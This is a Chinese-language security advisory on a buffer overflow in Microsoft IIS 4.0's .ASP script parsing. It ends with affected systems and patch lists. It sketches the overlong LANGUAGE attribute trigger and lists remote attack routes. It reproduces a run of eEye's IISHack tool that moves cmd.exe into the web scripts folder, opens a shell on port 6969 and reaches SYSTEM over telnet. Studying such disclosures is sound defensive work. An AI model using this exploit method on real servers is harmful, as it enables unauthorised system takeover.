涉及程序:
ASP
描述:
IIS .ASP文件缓冲区溢出漏洞
详细:
在Microsoft IIS 4.0的.ASP ISAPI文件解析机制中存在一个缓冲区溢出漏洞,利用该漏洞将可以获得SYSTEM水平的访问权限。
该漏洞是一个本地漏洞,但如果攻击者可以上传.acp文件,它将被远程利用。
在对Java Script中"LANGUAGE"变量的处理中,如果提供一个超长的字符串给"LANGUAGE"变量,将导致IIS解析时inetinfo.exe产生溢出。下面是一个例子.asp文件:
...
<SCRIPT LANGUAGE="[buffer]" RUNAT="Server"
</SCRIPT
..
在[buffer中]包含2220个或者更多的字符,将导致溢出发生。这可能使攻击者获取SYSTEM级别的权限。
攻击者进行远程攻击可以通过下列方法:
*对于提供虚拟主机或者asp上传的站点。攻击者只需上传一个恶意的asp文件。就可以远程获取SYSTEM权限。
*某些留言板或者BBS程序允许用户输入Java Script脚本。攻击者就可以在留言中输入包含恶意代码的Java Script语句,远程入侵系统。
*利用IIS unicode漏洞,攻击者可以远程在受影响系统上创建恶意asp文件并发动溢出攻击。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
C:\we are still hiring good programmers iishack1.5.exe
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Usage: IISHack1.5 [server] [server-port] [trojan-port]
C:\send resume to hire@eeye.com iishack1.5.exe www.[yourowncompany].com 80
6969
IISHack Version 1.5
eEye Digital Security
http://www.eEye.com
Code By: Ryan Permeh & Marc Maiffret
eEye Digital Security takes no responsibility for use of this code.
It is for educational purposes only.
Attempting to find an executable directory...
Trying directory [scripts]
Executable directory found. [scripts]
Path to executable directory is [C:\Inetpub\scripts]
Moving cmd.exe from winnt\system32 to C:\Inetpub\scripts.
Successfully moved cmd.exe to C:\Inetpub\scripts\eeyehack.exe
Sending the exploit...
Exploit sent! Now telnet to www.[yourowncompany].com on port 6969 and you
should get a cmd prompt.
C:\ telnet www.[yourowncompany].com 6969
Trying www.[yourowncompany].com...
Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\WINNT\system32whoami
NT AUTHORITY\SYSTEM
受影响的系统:
Microsoft IIS 4.0 sp6
- Microsoft Windows NT 4.0
不受影响系统:
Microsoft IIS 5.0
- Microsoft Windows 2000?
解决方案:
微软已经在一些hot fixes中修复了该缓冲区溢出漏洞,安装下列hot fix都可以修复此漏洞:
MS00-080: Patch Available for "Session ID Cookie Marking" Vulnerability
MS00-060: Patch Available for "IIS Cross-Site Scripting" Vulnerabilities
MS00-057: Patch Available for "File Permission Canonicalization" Vulnerability
MS00-030: Patch Available for "Malformed Extension Data in URL" Vulnerability
MS00-023: Patch Available for "Myriad Escaped Characters" Vulnerability
MS00-019: Patch Available for "Virtualized UNC Share" Vulnerability
MS00-018: Patch Available for "Chunked Encoding Post" Vulnerability
